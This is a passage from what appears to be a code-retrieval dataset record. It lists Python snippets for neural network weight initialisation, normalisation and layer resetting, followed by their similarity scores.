self.layer.v, axis=self.norm_axes) * self.layer.g", "def normalize_weight(self, Z):\n self.weight /= Z", "def init_weights(self):\n with torch.no_grad():\n self._init_weights()", "def reset(self):\n ih = (param for name, param in self.named_parameters() if 'weight_ih' in name)\n hh = (param for name, param in self.named_parameters() if 'weight_hh' in name)\n b = (param for 
name, param in self.named_parameters() if 'bias' in name)\n for t in ih:\n torch.nn.init.xavier_uniform_(t)\n for t in hh:\n torch.nn.init.orthogonal_(t)\n for t in b:\n torch.nn.init.constant_(t, 0)", "def init_weights(self, clz):\n for ch in self.children():\n if issubclass(ch.__class__, nn.Module) and not issubclass(ch.__class__, PreTrainedModel):\n ch.apply(lambda module: clz._init_weights(self.lrm, module))", "def clear_layers_name():\n set_keep['_layers_name_list'] =[]", "def normalize_parameters(self):\n self.entity_embeddings.weight.data = normalize(self.entity_embeddings.weight.data,\n p=self.norm_type, dim=1)", "def reset_nn(self): # Clear current network\n self.weights = np.zeros((p.num_rovers, self.n_weights))\n self.in_layer = np.zeros((p.num_rovers, self.n_inputs))\n self.hid_layer = np.zeros((p.num_rovers, self.n_nodes))\n self.out_layer = np.zeros((p.num_rovers, self.n_outputs))", "def trainFreezeBN(self):\n\t\tprint(\"Freezing Mean/Var of BatchNorm2D.\")\n\t\tprint(\"Freezing Weight/Bias of BatchNorm2D.\")\n\t\tfor m in self.modules():\n\t\t\tif isinstance(m, nn.BatchNorm2d):\n\t\t\t\tm.eval()\n\t\t\t\tm.weight.requires_grad = False\n\t\t\t\tm.bias.requires_grad = False", "def trainFreezeBN(self):\n\t\tprint(\"Freezing Mean/Var of BatchNorm2D.\")\n\t\tprint(\"Freezing Weight/Bias of BatchNorm2D.\")\n\t\tfor m in self.modules():\n\t\t\tif isinstance(m, nn.BatchNorm2d):\n\t\t\t\tm.eval()\n\t\t\t\tm.weight.requires_grad = False\n\t\t\t\tm.bias.requires_grad = False", "def unfreeze_layers(model: torch.nn.Module) -> None:\n for param in model.parameters():\n param.requires_grad = True", "def normalize_parameters(self):\n self.entity_embeddings.weight.data = normalize(self.entity_embeddings.weight.data,\n p=2, dim=1)\n self.relation_embeddings.weight.data = normalize(self.relation_embeddings.weight.data,\n p=2, dim=1)\n self.projection_matrices.data = normalize(self.projection_matrices.data, p=2, dim=2)", "def _weight_initializer(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1.0)\n nn.init.constant_(m.bias, 0.0)", "def normalize_parameters(self):\n self.entity_embeddings.weight.data = normalize(self.entity_embeddings.weight.data,\n p=2, dim=1)\n self.relation_embeddings.weight.data = normalize(self.relation_embeddings.weight.data,\n p=2, dim=1)\n self.ent_proj_vects.data = normalize(self.ent_proj_vects.data, p=2, dim=1)\n self.rel_proj_vects.data = normalize(self.rel_proj_vects.data, p=2, dim=1)", "def reset_weights(self):\n np.random.seed(self.seed)\n self.node_embedding = xavier_normal(size=(self.vocab_size, self.layer1_size), as_type=np.float32)\n self.context_embedding = xavier_normal(size=(self.vocab_size, self.layer1_size), as_type=np.float32)\n\n\n self.centroid = np.zeros((self.k, self.layer1_size), dtype=np.float32)\n self.covariance_mat = np.zeros((self.k, self.layer1_size, self.layer1_size), dtype=np.float32)\n self.inv_covariance_mat = np.zeros((self.k, self.layer1_size, self.layer1_size), dtype=np.float32)\n self.pi = np.zeros((self.vocab_size, self.k), dtype=np.float32)", "def remove_weights(self):\n cdef StdVectorFst result = StdVectorFst(isyms=self.isyms, osyms=self.osyms)\n openfst.ArcMap(self.fst[0], result.fst, openfst.RmTropicalWeightMapper())\n return result", "def turn_intensity_normalization_off(self):\n self.intensity_normalize_image = False", "def module_cleanup():\n from bokeh.core.has_props import _default_resolver\n to_reset = 
list(panel_extension._imports.values())\n\n _default_resolver._known_models = {\n name: model for name, model in _default_resolver._known_models.items()\n if not any(model.__module__.startswith(tr) for tr in to_reset)\n }", "def reset(self):\n weight = self.module.weight.data\n self.sensitivity_in = torch.zeros(weight.shape[1]).to(weight.device)\n self._features = torch.Tensor()\n self._current_batch = 1", "def _weight_initializer(self):\n for m in self.modules():\n if isinstance(m, nn.ConvTranspose2d):\n nn.init.kaiming_normal_(m.weight)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1.0)\n nn.init.constant_(m.bias, 0.0)", "def reset_pooling_layer(self):\n self._semantic_decoder.reset_pooling_layer()\n if self._instance_decoder is not None:\n self._instance_decoder.reset_pooling_layer()", "def reset_pooling_layer(self):\n self._aspp.reset_pooling_layer()", "def extract_weights(self, name):\n\n # Extract weights\n weight_layer = (self.merged_model).get_layer(name)\n weights = weight_layer.get_weights()[0]\n\n # Normalize\n # weights = weights / np.linalg.norm(weights, axis = 1).reshape((-1, 1))\n return weights", "def reset_parameters(self):\n if self.W is not None:\n tanh_gain = weight_init.calculate_gain(\"tanh\")\n weight_init.xavier_normal_(self.W, tanh_gain)\n # self.W.data.uniform_(-0.001, 0.001)", "def modify_weights_after_load(model):\n # Prune heads if needed\n if model.config.pruned_heads:\n model.prune_heads(model.config.pruned_heads)\n\n # Tie weights if needed\n model.tie_weights()", "def init_weights(model, fc_init_std=0.01):\n for m in model.modules():\n if isinstance(m, nn.Conv3d):\n \"\"\"\n Follow the initialization method proposed in:\n {He, Kaiming, et al.\n \"Delving deep into rectifiers: Surpassing human-level\n performance on imagenet classification.\"\n arXiv preprint arXiv:1502.01852 (2015)}\n \"\"\"\n c2_msra_fill(m, nonlinearity=('relu', 'leaky_relu')[0])\n # c2_xavier_fill(m)\n # nn.init.xavier_normal_(m.weight)\n # nn.init.xavier_uniform_(m.weight)\n # if m.bias is not None: # pyre-ignore\n # nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.BatchNorm3d) or isinstance(m, nn.InstanceNorm3d):\n m.weight.data.fill_(1.0)\n m.bias.data.zero_()\n if isinstance(m, nn.Linear): # This assumes nn.Linear is the final layers\n # TODO check to see if this is effective in this architecture since the final is a conv3d\n m.weight.data.normal_(mean=0.0, std=fc_init_std)\n m.bias.data.zero_()", "def _init_weights(self):\n nn.init.xavier_normal_(self.out.weight)", "def normalize_weights(w, dims=(0,), bias=1e-5):\n with tf.name_scope('normalization'):\n return w / (tf.sqrt(tf.reduce_sum(tf.square(w), dims, keep_dims=True) + bias))", "def init_weights(net):\n for m in net.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.Linear):\n nn.init.xavier_uniform_(m.weight)\n # nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n return net", "def normalize(self, weights):\n tot = sum(weights)\n newW = [-1] * self.numParticles\n for i in range(len(weights)):\n newW[i] = weights[i] / tot\n return newW", "def train(self, mode=True, freeze_bn=False):\n super(WideResNet, self).train(mode)\n self.freeze_bn = freeze_bn\n if self.freeze_bn:\n print(\"Freezing Mean/Var of BatchNorm2D.\")\n print(\"Freezing Weight/Bias of BatchNorm2D.\")\n if self.freeze_bn:\n for m in self.modules():\n 
if isinstance(m, nn.BatchNorm2d):\n m.eval()\n m.weight.requires_grad = False\n m.bias.requires_grad = False", "def set_weights_without_biases(self, weights, layer_number):\r\n self.weights[layer_number] = weights", "def _cleanup(self):\n\n self.netIns = []\n self.netOuts = []\n self.Gradients = [None]*self.size", "def _init_weights(layer):\n if isinstance(layer, (nn.Conv2d, nn.Linear)):\n torch.nn.init.xavier_uniform_(layer.weight)\n try:\n # Some layers may not have biases, so catch the exception and pass.\n layer.bias.data.fill_(0.0)\n except AttributeError:\n pass", "def reset(self):\n\n def reset_function(module):\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.Linear):\n m.reset_parameters()\n\n self.apply(reset_function)", "def init_weights(self):\n\n for ch in self.children():\n if issubclass(ch.__class__, torch.nn.Module) and not issubclass(ch.__class__, PreTrainedModel):\n ch.apply(lambda module: self.transformer.__class__._init_weights(self.transformer, module))", "def reset_parameters(self) -> None:\n std = math.sqrt(3 / self.in_features)\n self.weight.data.uniform_(-std, std)\n self.bias.data.uniform_(-std, std)", "def applyMorphologicalCleaning(self, image):", "def test_permute_W_no_model(self):\n\t\tN, M = 4096, 4096\n\t\titerator = self.watcher.make_layer_iterator(model=self.model, layers=[self.fc2_layer])\n\t\tfor ww_layer in iterator:\n\t\t\tself.assertEqual(ww_layer.layer_id,self.fc2_layer)\n\t\t\tW = ww_layer.Wmats[0]\n\t\t\tself.assertEqual(W.shape,(N,M))\n\t\t\t\n\t\t\tself.watcher.apply_permute_W(ww_layer)\n\t\t\tW2 = ww_layer.Wmats[0]\n\t\t\tself.assertNotEqual(W[0,0],W2[0,0])\n\t\t\t\n\t\t\tself.watcher.apply_unpermute_W(ww_layer)\n\t\t\tW2 = ww_layer.Wmats[0]\n\t\t\tself.assertEqual(W2.shape,(N,M))\n\t\t\tself.assertEqual(W[0,0],W2[0,0])", "def reset_layer(self):\n if self.W is None:\n if self.sparse_initialize:\n W_values = self.sparse_initialize_weights()\n else:\n if self.activation == theano.tensor.tanh:\n born = np.sqrt(6. / (self.n_in + self.n_out))\n else:\n born = 4 * np.sqrt(6. 
/ (self.n_in + self.n_out))\n W_values = np.asarray(self.rng.uniform(\n low=-born,\n high=born,\n size=(self.n_in, self.n_out)),\n dtype=theano.config.floatX)\n\n self.W = theano.shared(value=W_values, name='W', borrow=True)\n\n if self.b is None:\n b_values = np.zeros(int(self.n_out/self.num_pieces),\n dtype=theano.config.floatX)\n self.b = theano.shared(value=b_values, name='b', borrow=True)\n\n if self.sparser is None:\n s_values = np.ones(\n int(self.n_out/self.num_pieces), dtype=theano.config.floatX)\n self.sparser = theano.shared(value=s_values, name='sparser',\n borrow=True)\n # The layer parameters\n self.params = [self.W, self.b]", "def RemoveWeights(frame, zero_nans=False):\n if \"Wpol\" not in frame and \"Wunpol\" not in frame:\n return\n\n if not frame[\"T\"].weighted:\n return frame\n ValidateMaps(frame)\n\n tmap = frame.pop(\"T\")\n\n if \"Wpol\" in frame:\n wmap = frame[\"Wpol\"]\n qmap = frame.pop(\"Q\")\n umap = frame.pop(\"U\")\n maps.remove_weights(tmap, qmap, umap, wmap, zero_nans=zero_nans)\n else:\n wmap = frame[\"Wunpol\"]\n maps.remove_weights_t(tmap, wmap, zero_nans=zero_nans)\n\n frame[\"T\"] = tmap\n if \"Wpol\" in frame:\n frame[\"Q\"] = qmap\n frame[\"U\"] = umap\n\n return frame", "def reset_parameters(self):\n\n for layer in self.layers:\n layer.reset_parameters()", "def _untrain(self):\n if not self.trained:\n return\n for clf in self.clfs:\n clf.untrain()\n super(BoostedClassifier, self)._untrain()", "def init_weights(module, negative_slope=0):\n if isinstance(module, (nn.Conv2d, nn.ConvTranspose2d)):\n nn.init.kaiming_normal_(module.weight.data, negative_slope)\n module.bias.data.zero_()", "def remove_blurring(self):\n self._render_passes.remove_blur_pass()", "def normalize_parameters(self):\n self.entity_embeddings.weight.data = normalize(self.entity_embeddings.weight.data,\n p=self.norm_type, dim=1)\n self.normal_vectors.data = normalize(self.normal_vectors, p=2, dim=1)", "def initialize_weights(self):\n weights_initializer.WeightsInitializer.initialize_layer_or_model(\n self._batch)", "def reset_layers(self, rov_id): # Clear hidden layers and output layers\n for i in range(self.n_nodes):\n self.hid_layer[rov_id, i] = 0.0\n\n for j in range(self.n_outputs):\n self.out_layer[rov_id, j] = 0.0", "def weight_norm(module, name=\"weight\", dim=0):\n WeightNorm.apply(module, name, dim)\n return module" ]
[ "0.79998016", "0.76628864", "0.7629923", "0.72848314", "0.7045166", "0.67848754", "0.6780856", "0.6746634", "0.6591088", "0.65823525", "0.6566755", "0.65617", "0.65572643", "0.65561306", "0.6538293", "0.6538293", "0.6538293", "0.6529808", "0.6526071", "0.651576", "0.64801204", "0.6455137", "0.64305204", "0.642898", "0.6405197", "0.6397573", "0.63855386", "0.6293032", "0.6251394", "0.6249921", "0.6233528", "0.6218253", "0.62125546", "0.6161037", "0.6131475", "0.61087567", "0.60970056", "0.6089598", "0.60496736", "0.60437787", "0.60437787", "0.60437787", "0.6040404", "0.60095733", "0.59844965", "0.5978158", "0.597737", "0.5969688", "0.5968303", "0.5965113", "0.5965113", "0.5962245", "0.59447", "0.5936001", "0.5907403", "0.59055173", "0.5901809", "0.5892338", "0.58894366", "0.58894366", "0.5871337", "0.5862168", "0.58555585", "0.5836302", "0.58316904", "0.5826069", "0.5822462", "0.5818256", "0.5817126", "0.5813045", "0.5796031", "0.5795884", "0.57813996", "0.57679164", "0.57545006", "0.57498974", "0.5747443", "0.57424116", "0.57346195", "0.5728497", "0.57271147", "0.5710471", "0.5693999", "0.5684778", "0.56757396", "0.5671626", "0.5663894", "0.5649495", "0.5648036", "0.56285703", "0.5622598", "0.5621248", "0.5614808", "0.5613118", "0.5610067", "0.55977714", "0.5596888", "0.55955064", "0.5567413" ]
0.7893102
1
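For context between the record above and the one that follows, both of which pair the docstring of a weight-norm helper with its implementation: below is a minimal, self-contained sketch of how such apply/remove helpers are typically used around training and inference in PyTorch. The TinyGenerator class, its layer sizes, and the tensor shapes are invented for illustration and are not part of the dataset; only torch.nn.utils.weight_norm and torch.nn.utils.remove_weight_norm are standard library calls.

import torch

class TinyGenerator(torch.nn.Module):
    def __init__(self):
        super().__init__()
        self.conv = torch.nn.Conv1d(1, 8, kernel_size=3, padding=1)
        self.out = torch.nn.ConvTranspose1d(8, 1, kernel_size=4, stride=2, padding=1)

    def forward(self, x):
        return self.out(torch.relu(self.conv(x)))

    def apply_weight_norm(self):
        # wrap every Conv1d / ConvTranspose1d weight with the weight-norm reparameterization
        def _apply(m):
            if isinstance(m, (torch.nn.Conv1d, torch.nn.ConvTranspose1d)):
                torch.nn.utils.weight_norm(m)
        self.apply(_apply)

    def remove_weight_norm(self):
        # strip the reparameterization again, e.g. before export or inference
        def _remove(m):
            try:
                torch.nn.utils.remove_weight_norm(m)
            except ValueError:  # this module had no weight norm attached
                pass
        self.apply(_remove)

model = TinyGenerator()
model.apply_weight_norm()    # train with the g/v reparameterization in place
# ... training loop would go here ...
model.remove_weight_norm()   # fold g/v back into a plain weight tensor
print(model(torch.randn(1, 1, 16)).shape)

Weight norm is usually kept during training for better conditioning of the convolution weights and stripped before export, so the folded weights behave like ordinary convolutions at inference time.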
Apply weight normalization module from all of the layers.
def apply_weight_norm(self): def _apply_weight_norm(m): if isinstance(m, torch.nn.Conv1d) or isinstance( m, torch.nn.ConvTranspose1d ): torch.nn.utils.weight_norm(m) logging.debug(f"Weight norm is applied to {m}.") self.apply(_apply_weight_norm)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _init_weights(self):\n for layer in self.modules():\n if isinstance(layer, (nn.Conv1d, nn.Linear)):\n nn.init.xavier_uniform_(layer.weight)\n if layer.bias is not None:\n nn.init.constant_(layer.bias, 0)\n elif isinstance(layer, nn.BatchNorm1d):\n nn.init.constant_(layer.weight, 1)\n nn.init.constant_(layer.bias, 0)", "def _init_weights(self):\n for layer in self.modules():\n if isinstance(layer, (nn.Conv1d, nn.Linear)):\n nn.init.xavier_uniform_(layer.weight)\n if layer.bias is not None:\n nn.init.constant_(layer.bias, 0)\n elif isinstance(layer, nn.BatchNorm1d):\n nn.init.constant_(layer.weight, 1)\n nn.init.constant_(layer.bias, 0)", "def _init_weights(self):\n for layer in self.modules():\n if isinstance(layer, (nn.Conv1d, nn.Linear)):\n nn.init.xavier_uniform_(layer.weight)\n if layer.bias is not None:\n nn.init.constant_(layer.bias, 0)\n elif isinstance(layer, nn.BatchNorm1d):\n nn.init.constant_(layer.weight, 1)\n nn.init.constant_(layer.bias, 0)", "def associate_normalization_layers(self, model):\n if (len(self.leaf_modules) == 0):\n self.retrieve_leaf_modules(model) \n # Association list\n self.norm_modules = []\n self.prune_modules = []\n # Current weighted layer\n cur_weighted = None\n # Associate norm layers to their immediate previous weighted layers\n for name, m in self.leaf_modules:\n if (m.__class__ in [nn.Linear, nn.Conv1d, nn.Conv2d, nn.Conv3d, nn.ConvTranspose2d, nn.ConvTranspose3d]):\n cur_weighted = m\n if (m.__class__ in [nn.RNN, nn.GRU, nn.LSTM]):\n cur_weighted = m\n if ('Norm' in str(m.__class__)):\n if (cur_weighted is not None):\n self.norm_modules.append((m, cur_weighted))", "def _compute_weights(self):\n with variable_scope.variable_scope('compute_weights'):\n self.layer.W = nn_impl.l2_normalize(\n self.layer.v, axis=self.norm_axes) * self.layer.g", "def _compute_weights(self):\n with variable_scope.variable_scope('compute_weights'):\n self.layer.W = nn_impl.l2_normalize(\n self.layer.v, axis=self.norm_axes) * self.layer.g", "def _init_weights(self):\n for m in self.modules():\n if type(m) in {\n nn.Linear,\n nn.Conv3d,\n nn.Conv2d,\n nn.ConvTranspose2d,\n nn.ConvTranspose3d\n }:\n nn.init.kaiming_normal_(\n m.weight.data, a=0, mode='fan_out', nonlinearity='relu',\n )\n if m.bias is not None:\n fan_in, fan_out = \\\n nn.init._calculate_fan_in_and_fan_out(m.weight.data)\n bound = 1 / math.sqrt(fan_out)\n nn.init.normal_(m.bias, -bound, bound)", "def normalize_weights(self):\n total_weight = sum(self.weights)\n self.norm_weights = self.weights / float(total_weight)", "def _initialize_weights(self):\r\n for m in self.modules():\r\n if isinstance(m, nn.Conv2d):\r\n m.weight.data.normal_(0, 0.05)\r\n if m.bias is not None:\r\n m.bias.data.zero_()", "def initialize_weights(self):\n for layer in self._cnn_layers:\n weights_initializer.WeightsInitializer.initialize_layer_or_model(layer)", "def init_weights(self):\n # We don't use the `init_weights()` function in BaseModule, since it\n # doesn't support the initialization method from `reset_parameters()`\n # in Pytorch.\n if self.with_backbone:\n self.backbone.init_weights()\n\n if self.with_neck:\n for m in self.neck.modules():\n if isinstance(m, _ConvNd) or isinstance(m, _BatchNorm):\n m.reset_parameters()\n\n if self.with_head:\n for m in self.head.modules():\n if isinstance(m, _ConvNd) or isinstance(m, _BatchNorm):\n m.reset_parameters()", "def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.ConvTranspose2d):\n xavier_uniform_(m.weight)\n if m.bias is not 
None:\n zeros_(m.bias)", "def normalize_weights(self):\n \n # Set negative weights to zero\n # Normalize to sum to one.\n \n\n\n self.new_weight=[]\n for i in self._weights:\n if any(i < 0 for i in self._weights):\n self.new_weight = [0,1]\n\n elif all(i == 0 for i in self._weights):\n i = 1/len(self._weights)\n self.new_weight.append(i)\n else:\n i = i/sum(self._weights)\n self.new_weight.append(i)\n\n # If the weights are all zeros, set weights equal to 1/k, where k is the number\n # of components.\n self._weights = self.new_weight\n self._weights = np.round(self._weights,3)", "def normalizeWeights(self):\n for wt in self.weights:\n wt[wt>1] = 1\n wt[wt<-1] = -1\n for bs in self.bias:\n bs[bs>1] = 1\n bs[bs<-1] = -1", "def _reset_weights(m):\n\n nn = import_optional_dependency(\"torch.nn\")\n init = import_optional_dependency(\"torch.nn.init\")\n if isinstance(m, nn.Conv1d):\n init.normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.Conv2d):\n init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.Conv3d):\n init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.ConvTranspose1d):\n init.normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.ConvTranspose2d):\n init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.ConvTranspose3d):\n init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.BatchNorm1d):\n init.normal_(m.weight.data, mean=1, std=0.02)\n init.constant_(m.bias.data, 0)\n elif isinstance(m, nn.BatchNorm2d):\n init.normal_(m.weight.data, mean=1, std=0.02)\n init.constant_(m.bias.data, 0)\n elif isinstance(m, nn.BatchNorm3d):\n init.normal_(m.weight.data, mean=1, std=0.02)\n init.constant_(m.bias.data, 0)\n elif isinstance(m, nn.Linear):\n init.xavier_normal_(m.weight.data)\n init.normal_(m.bias.data)\n elif isinstance(m, nn.LSTM):\n for param in m.parameters():\n if len(param.shape) >= 2:\n init.orthogonal_(param.data)\n else:\n init.normal_(param.data)\n elif isinstance(m, nn.LSTMCell):\n for param in m.parameters():\n if len(param.shape) >= 2:\n init.orthogonal_(param.data)\n else:\n init.normal_(param.data)\n elif isinstance(m, nn.GRU):\n for param in m.parameters():\n if len(param.shape) >= 2:\n init.orthogonal_(param.data)\n else:\n init.normal_(param.data)\n elif isinstance(m, nn.GRUCell):\n for param in m.parameters():\n if len(param.shape) >= 2:\n init.orthogonal_(param.data)\n else:\n init.normal_(param.data)", "def remove_norms(module_: \"WN\") -> \"WN\":\n module_.start = torch.nn.utils.remove_weight_norm(module_.start_conv)\n module_.cond_layer = torch.nn.utils.remove_weight_norm(module_.cond_layer)\n for i, layer_ in enumerate(module_.in_layers):\n layer_ = DepthwiseSeparableConv1d.remove_batch_norm(layer_)\n module_.in_layers[i] = layer_\n for i, layer_ in enumerate(module_.res_skip_layers):\n layer_ = torch.nn.utils.remove_weight_norm(layer_)\n module_.res_skip_layers[i] = layer_\n return module_", "def _weight_initializer(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1.0)\n nn.init.constant_(m.bias, 0.0)", "def normalize_parameters(self):\n self.entity_embeddings.weight.data = normalize(self.entity_embeddings.weight.data,\n 
p=2, dim=1)\n self.relation_embeddings.weight.data = normalize(self.relation_embeddings.weight.data,\n p=2, dim=1)\n self.ent_proj_vects.data = normalize(self.ent_proj_vects.data, p=2, dim=1)\n self.rel_proj_vects.data = normalize(self.rel_proj_vects.data, p=2, dim=1)", "def _weight_initializer(self):\n for m in self.modules():\n if isinstance(m, nn.ConvTranspose2d):\n nn.init.kaiming_normal_(m.weight)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1.0)\n nn.init.constant_(m.bias, 0.0)", "def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n xavier_init(m)", "def normalize_parameters(self):\n self.entity_embeddings.weight.data = normalize(self.entity_embeddings.weight.data,\n p=2, dim=1)\n self.relation_embeddings.weight.data = normalize(self.relation_embeddings.weight.data,\n p=2, dim=1)\n self.projection_matrices.data = normalize(self.projection_matrices.data, p=2, dim=2)", "def normalize_parameters(self):\n self.entity_embeddings.weight.data = normalize(self.entity_embeddings.weight.data,\n p=self.norm_type, dim=1)", "def init_weights(self, clz):\n for ch in self.children():\n if issubclass(ch.__class__, nn.Module) and not issubclass(ch.__class__, PreTrainedModel):\n ch.apply(lambda module: clz._init_weights(self.lrm, module))", "def normalize_parameters(self):\n self.entity_embeddings.weight.data = normalize(self.entity_embeddings.weight.data,\n p=self.norm_type, dim=1)\n self.normal_vectors.data = normalize(self.normal_vectors, p=2, dim=1)", "def remove_weight_norm_(self):\n\n def _remove_weight_norm(m):\n try:\n torch.nn.utils.remove_weight_norm(m)\n except ValueError:\n return\n\n self.apply(_remove_weight_norm)", "def init_weight(self):\n init_layer(self.conv1)\n init_layer(self.conv2)\n init_bn(self.norm1)\n init_bn(self.norm2)", "def normalize(self, weights):\n tot = sum(weights)\n newW = [-1] * self.numParticles\n for i in range(len(weights)):\n newW[i] = weights[i] / tot\n return newW", "def layer_normalize_(self, ref_point: 'ModelParameters', order=2):\n # in-place normalize each parameter\n for layer_idx, parameter in enumerate(self.parameters, 0):\n parameter *= (ref_point.layer_norm(layer_idx, order) / self.layer_norm(layer_idx, order))", "def init_weights(self):\n\n for ch in self.children():\n if issubclass(ch.__class__, torch.nn.Module) and not issubclass(ch.__class__, PreTrainedModel):\n ch.apply(lambda module: self.transformer.__class__._init_weights(self.transformer, module))", "def init_weights(layer):\r\n layer_name = layer.__class__.__name__\r\n if layer_name.find(\"Conv\") != -1:\r\n layer.weight.data.normal_(0.0, 0.02)\r\n elif layer_name.find(\"BatchNorm\") != -1:\r\n layer.weight.data.normal_(1.0, 0.02)\r\n layer.bias.data.fill_(0)", "def _rescale_module(module):\n for sub in module.modules():\n if isinstance(sub, (nn.Conv1d, nn.ConvTranspose1d, nn.Conv2d, nn.ConvTranspose2d)):\n std = sub.weight.std().detach()\n scale = (std / 0.1) ** 0.5\n sub.weight.data /= scale\n if sub.bias is not None:\n sub.bias.data /= scale", "def init_weights(layer):\n layer_name = layer.__class__.__name__\n if layer_name.find(\"Conv\") != -1 and hasattr(layer, 'weight'):\n layer.weight.data.normal_(0.0, 0.02)\n elif layer_name.find(\"BatchNorm\") != -1 and hasattr(layer, 'weight'):\n layer.weight.data.normal_(1.0, 0.02)\n layer.bias.data.fill_(0)", "def _compute_weights(self):\n with tf.name_scope('compute_weights'):\n self.layer.kernel = tf.nn.l2_normalize(\n self.v, axis=self.kernel_norm_axes) * self.g", "def apply_on_layer(self, 
layer):\n init_g = Constant(1.)\n\n try:\n weight_tag = 'W' if hasattr(layer, 'W') else 'U'\n except AttributeError:\n raise AttributeError(\"Trying to call weight norm on {} \".format(layer)+\\\n \"without layer.W or layer.U defined\")\n weights = getattr(layer, weight_tag)\n\n Wndim = weights.get_value().ndim\n if Wndim == 4:\n W_axes_to_sum = (1,2,3)\n W_dimshuffle_args = (0,'x','x','x')\n elif Wndim == 5:\n W_axes_to_sum = (1,2,3,4)\n W_dimshuffle_args = (0,'x','x','x','x')\n elif Wndim == 3 :\n raise NotImplementedError(\"What is a weight with 3 dimensions?\")\n else :\n W_axes_to_sum = 0\n W_dimshuffle_args = ('x',0)\n\n if self.train_g is not None:\n g = init_g(layer.output_dims)\n g = theano.shared(g, name=layer.prefix+'_g')\n if self.train_g :\n layer.params += [g]\n\n new_weights = weights * (\n g / T.sqrt(1e-6 + T.sum(T.square(weights),\n axis=W_axes_to_sum))).dimshuffle(*W_dimshuffle_args)\n layer.g = g\n else:\n new_weights = weights / \\\n T.sqrt(1e-6 + T.sum(T.square(weights),\n axis=W_axes_to_sum,keepdims=True))\n\n setattr(layer, weight_tag, new_weights)", "def init_weights(self):\n for m in self.cls_convs:\n normal_init(m.conv, std=0.01)\n for m in self.reg_convs:\n normal_init(m.conv, std=0.01)\n bias_cls = bias_init_with_prob(0.01)\n normal_init(self.retina_cls, std=0.01, bias=bias_cls)\n normal_init(self.retina_reg, std=0.01)", "def normalize_weights(w, dims=(0,), bias=1e-5):\n with tf.name_scope('normalization'):\n return w / (tf.sqrt(tf.reduce_sum(tf.square(w), dims, keep_dims=True) + bias))", "def remove_weight_norm(self):\n\n def _remove_weight_norm(m):\n try:\n logging.debug(f\"Weight norm is removed from {m}.\")\n torch.nn.utils.remove_weight_norm(m)\n except ValueError: # this module didn't have weight norm\n return\n\n self.apply(_remove_weight_norm)", "def remove_weight_norm(self):\n\n def _remove_weight_norm(m):\n try:\n logging.debug(f\"Weight norm is removed from {m}.\")\n torch.nn.utils.remove_weight_norm(m)\n except ValueError: # this module didn't have weight norm\n return\n\n self.apply(_remove_weight_norm)", "def init_weights(self):\n for m in self.cls_convs:\n normal_init(m.conv, std=0.01)\n for m in self.reg_convs:\n normal_init(m.conv, std=0.01)\n normal_init(self.atss_reg, std=0.01)\n normal_init(self.atss_iou, std=0.01)\n bias_cls = bias_init_with_prob(0.01)\n normal_init(self.atss_cls, std=0.01, bias=bias_cls)", "def layer_norm(input, normalized_shape, weight, bias, eps=1e-5):\n return FunctionLib.apply(\n 'LayerNorm', input.device, [input, weight, bias],\n axis=input.ndimension() - len(normalized_shape), epsilon=eps)", "def init_weights(model, fc_init_std=0.01):\n for m in model.modules():\n if isinstance(m, nn.Conv3d):\n \"\"\"\n Follow the initialization method proposed in:\n {He, Kaiming, et al.\n \"Delving deep into rectifiers: Surpassing human-level\n performance on imagenet classification.\"\n arXiv preprint arXiv:1502.01852 (2015)}\n \"\"\"\n c2_msra_fill(m, nonlinearity=('relu', 'leaky_relu')[0])\n # c2_xavier_fill(m)\n # nn.init.xavier_normal_(m.weight)\n # nn.init.xavier_uniform_(m.weight)\n # if m.bias is not None: # pyre-ignore\n # nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.BatchNorm3d) or isinstance(m, nn.InstanceNorm3d):\n m.weight.data.fill_(1.0)\n m.bias.data.zero_()\n if isinstance(m, nn.Linear): # This assumes nn.Linear is the final layers\n # TODO check to see if this is effective in this architecture since the final is a conv3d\n m.weight.data.normal_(mean=0.0, std=fc_init_std)\n m.bias.data.zero_()", "def 
